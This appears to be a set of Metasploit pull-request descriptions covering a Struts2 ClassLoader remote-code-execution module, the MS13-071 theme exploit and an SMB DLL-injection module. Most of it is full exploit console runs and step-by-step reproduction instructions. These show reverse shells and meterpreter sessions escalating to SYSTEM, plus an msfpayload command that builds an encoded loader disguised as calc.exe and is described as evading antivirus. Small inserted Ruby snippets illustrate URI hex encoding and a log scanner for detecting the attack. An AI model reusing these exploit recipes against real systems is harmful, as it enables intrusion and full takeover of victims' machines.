'hex-all' encoding was previously ignoring slashes.
This pull adds a 'hex-noslashes' mode which carries forward the previous functionality, and replaces all existing references to 'hex-all' with 'hex-noslashes'. It then adds a replacement 'hex-all' mode, which really encodes *ALL* characters.
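The difference between the two modes, as an added illustration that is not part of the pull request or of Rex::Text itself (a stand-alone re-implementation of the two encoders plus a decoder to check the round trip):

```ruby
# Added illustration of the two URI hex-encoding modes discussed in the
# pull request; a stand-alone re-implementation, not the Rex::Text code.

# 'hex-noslashes': percent-encode every byte except the path separator '/'.
# This is the behaviour the old 'hex-all' mode actually had.
def hex_noslashes(str)
  str.each_byte.map { |b| b == '/'.ord ? '/' : format('%%%02x', b) }.join
end

# 'hex-all' (as fixed): percent-encode every byte, slashes included.
def hex_all(str)
  str.each_byte.map { |b| format('%%%02x', b) }.join
end

# Decoder used to show that both encodings round-trip to the original text.
def hex_decode(str)
  str.gsub(/%([0-9a-fA-F]{2})/) { $1.hex.chr }
end

if __FILE__ == $PROGRAM_NAME
  path = '/struts2-blank/example/HelloWorld.action'
  puts hex_noslashes(path)   # slashes survive as '/'
  puts hex_all(path)         # slashes become %2f
end
```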
Remove checks for specific Tomcat versions, instead checking whether a
stacktrace is returned when requesting
?Class.classLoader.resources.dirContext.cacheObjectMaxSize with invalid
arguments.
Tested against Tomcat 6 and Tomcat 7 with Struts 2.3.16.1
This commit adds an exploit for the Struts2 RCE utilising the Rex
SMBFileServer Protocol support to deploy a JSP shell over SMB.
```
resource (test4.msf)> use exploits/windows/http/struts_http_jspinject
resource (test4.msf)> set VERBOSE true
VERBOSE => true
resource (test4.msf)> set PAYLOAD java/jsp_shell_reverse_tcp
PAYLOAD => java/jsp_shell_reverse_tcp
resource (test4.msf)> set URI /struts2-blank/example/HelloWorld.action
URI => /struts2-blank/example/HelloWorld.action
resource (test4.msf)> set SHARE share
SHARE => share
resource (test4.msf)> set JSP /example/HelloWorld.jsp
JSP => /example/HelloWorld.jsp
resource (test4.msf)> set SRVHOST 172.31.6.41
SRVHOST => 172.31.6.41
resource (test4.msf)> set RHOST 172.31.6.245
RHOST => 172.31.6.245
resource (test4.msf)> set RPORT 8080
RPORT => 8080
resource (test4.msf)> set LHOST 172.31.6.41
LHOST => 172.31.6.41
resource (test4.msf)> set LPORT 4444
LPORT => 4444
resource (test4.msf)> exploit
[*] Started reverse handler on 172.31.6.41:4444
[*] Generating our malicious jsp...
[*] About to start SMB Server on: \\172.31.6.41\share for /example/HelloWorld.jsp
[*] Starting SMB Server on 172.31.6.41:445
[*] Injecting JSP to 172.31.6.245:8080 - /struts2-blank/example/HelloWorld.action?Class.classLoader.resources.dirContext.docBase=//172.31.6.41/share
[*] 172.31.6.245:8080 - JSP payload uploaded successfully
[*] Command shell session 1 opened (172.31.6.41:4444 -> 172.31.6.245:1146) at 2014-05-01 12:09:25 +0100
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\Apache Software Foundation\apache-tomcat-7.0.53\bin>
```
1. Install Tomcat 7.0.53
2. Download and unpack Struts 2.3.16.1 (http://www.mirrorservice.org/sites/ftp.apache.org//struts/binaries/struts-2.3.16.1-all.zip)
3. Deploy struts-2.3.16.1/apps/struts2-blank.war through Tomcat Manager interface
4. use exploits/windows/http/struts_http_jspinject
5. set PAYLOAD java/jsp_shell_reverse_tcp
6. set URI /struts2-blank/example/HelloWorld.action
7. set SHARE share
8. set JSP /example/HelloWorld.jsp
9. set SRVHOST
10. set RHOST
11. set RPORT 8080
12. set LHOST
13. set LPORT 4444
14. exploit
15. Enjoy shells
- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/http/struts_http_jspinject
Tomcat 7.0.53 & Struts 2.3.16.1
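As an added defender-side example that is not part of this pull request, the following Ruby scans access-log lines for the ClassLoader parameter manipulation shown in the module output above (the docBase write and the cacheObjectMaxSize fingerprint probe). The combined log format and the sample lines are constructed assumptions; parameter names are percent-decoded before matching so a hex-encoded name is still caught.

```ruby
# Added example (not part of the pull request): a defender-side check that flags
# Struts2 ClassLoader-manipulation attempts in Tomcat/Apache access logs. The
# indicator is any request parameter whose name starts with "Class.classLoader"
# (matched case-insensitively), such as the ...dirContext.docBase and
# ...dirContext.cacheObjectMaxSize parameters in the module output above.
require 'uri'

# Combined log format: client ident user [time] "METHOD path HTTP/x" status size
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/
CLASSLOADER_PREFIX = 'class.classloader'

# Returns a hash describing the request, or nil if the line does not parse.
def parse_access_line(line)
  m = LOG_RE.match(line) or return nil
  { client: m[1], time: m[2], method: m[3], path: m[4], status: m[5].to_i }
end

# Decoded parameter names from the query string (empty if there is none).
def param_names(path)
  query = path.split('?', 2)[1] or return []
  query.split('&').reject(&:empty?).map do |kv|
    name = kv.split('=', 2)[0]
    URI.decode_www_form_component(name) rescue name # keep the raw name if the encoding is malformed
  end
end

# Returns one finding per suspicious request. :probe is true when the request looks
# like the version-agnostic fingerprint check: cacheObjectMaxSize answered with a 500.
def scan_access_log(lines)
  lines.each_with_object([]) do |line, findings|
    req = parse_access_line(line) or next
    hits = param_names(req[:path]).select { |n| n.downcase.start_with?(CLASSLOADER_PREFIX) }
    next if hits.empty?
    probe = req[:status] == 500 && hits.any? { |n| n.end_with?('cacheObjectMaxSize') }
    findings << { client: req[:client], time: req[:time], status: req[:status], params: hits, probe: probe }
  end
end

# Constructed sample lines; the second hides the parameter name behind hex escapes.
SAMPLE_LOG = [
  '172.31.6.41 - - [01/May/2014:12:09:20 +0100] "GET /struts2-blank/example/HelloWorld.action?Class.classLoader.resources.dirContext.cacheObjectMaxSize=x HTTP/1.1" 500 1234',
  '172.31.6.41 - - [01/May/2014:12:09:25 +0100] "GET /struts2-blank/example/HelloWorld.action?%43lass.%63lassLoader.resources.dirContext.docBase=//172.31.6.41/share HTTP/1.1" 200 87',
  '10.0.0.5 - - [01/May/2014:12:10:00 +0100] "GET /struts2-blank/example/HelloWorld.action?name=bob HTTP/1.1" 200 87'
]

if __FILE__ == $PROGRAM_NAME
  scan_access_log(SAMPLE_LOG).each { |f| puts f.inspect }
end
```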
This commit refactors the ms13_071_theme module written by @jvazquez-r7
to utilise the Rex SMBFileServer protocol and remove duplicate code from
Metasploit.
```
[*] Processing test3.msf for ERB directives.
resource (test3.msf)> use exploits/windows/fileformat/ms13_071_theme
resource (test3.msf)> set VERBOSE true
VERBOSE => true
resource (test3.msf)> set SHARE share
SHARE => share
resource (test3.msf)> set SCR exploit.scr
SCR => exploit.scr
resource (test3.msf)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (test3.msf)> set LHOST 172.32.255.1
LHOST => 172.32.255.1
resource (test3.msf)> set SRVHOST 172.32.255.1
SRVHOST => 172.32.255.1
resource (test3.msf)> set LPORT 4444
LPORT => 4444
resource (test3.msf)> exploit
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.scr
[*] Starting SMB Server on 172.32.255.1:445
[*] Sending stage (769536 bytes) to 172.32.255.129
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.129:1096) at 2014-04-30 12:05:46 +0100
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
1. use exploits/windows/fileformat/ms13_071_theme
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST
4. set SRVHOST
5. exploit
6. Copy msf.theme to target
7. Open theme and navigate to "Screensaver" tab
8. Enjoy shells
- [ ] Land #3074
- [ ] Land #3075
- [ ] Run exploits/windows/fileformat/ms13_071_theme
- [ ] Let target open malicious msf.theme file
* Windows XP SP3
This is an implementation of using the SMBFileServer mixin to perform
DLL injection over SMB.
Exploitation can be performed by starting the dllinjector exploit,
which will remain resident until a DLL is downloaded and a session
created. By generating an executable using the windows/loadlibrary
payload it is possible to test the SMBServer mixin on various platforms;
it also serves as a novel injection method where LoadLibrary calls are
not being filtered by Antivirus or EMET.
Example Run
```
# msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp SHARE=share DLL=exploit.dll LHOST=172.32.255.1 LPORT=4444 SRVHOST=172.32.255.1 E
[*] Initializing modules...
PAYLOAD => windows/meterpreter/reverse_tcp
SHARE => share
DLL => exploit.dll
LHOST => 172.32.255.1
LPORT => 4444
SRVHOST => 172.32.255.1
[*] Started reverse handler on 172.32.255.1:4444
[*] Generating our malicious dll...
[*] Starting SMB Server on: \\172.32.255.1\share\exploit.dll
[*] Sending stage (769536 bytes) to 172.32.255.128
[*] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.128:1186) at 2014-04-24 11:18:55 +0100
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
Reproduction Steps
* Generate dllinjector executable (non-malicious)
```
msfpayload windows/loadlibrary DLL="\\\\1.2.3.4\\share\\exploit.dll" R | msfencode -b '\x00' -t exe -x calc.exe -k -o dllinjector.exe -e x86/shikata_ga_nai -c 3
```
* Run DLL Injection server
```
msfcli exploits/windows/smb/dllinjector PAYLOAD=windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=4444 SRVHOST=1.2.3.4 SHARE=share DLL=exploit.dll E
```
* Execute dllinjector.exe on the target host
* Monitor the generated traffic in Wireshark
* Enjoy shells.
Verification
- [ ] Land #3074
- [ ] Land #3075
- [ ] Generate loadlibrary executable
- [ ] Load dllinjector with payload
- [ ] Run executable on target
Tested on:
* Windows 7 (x86/x64)
* Windows Server 2003
* Windows Server 2008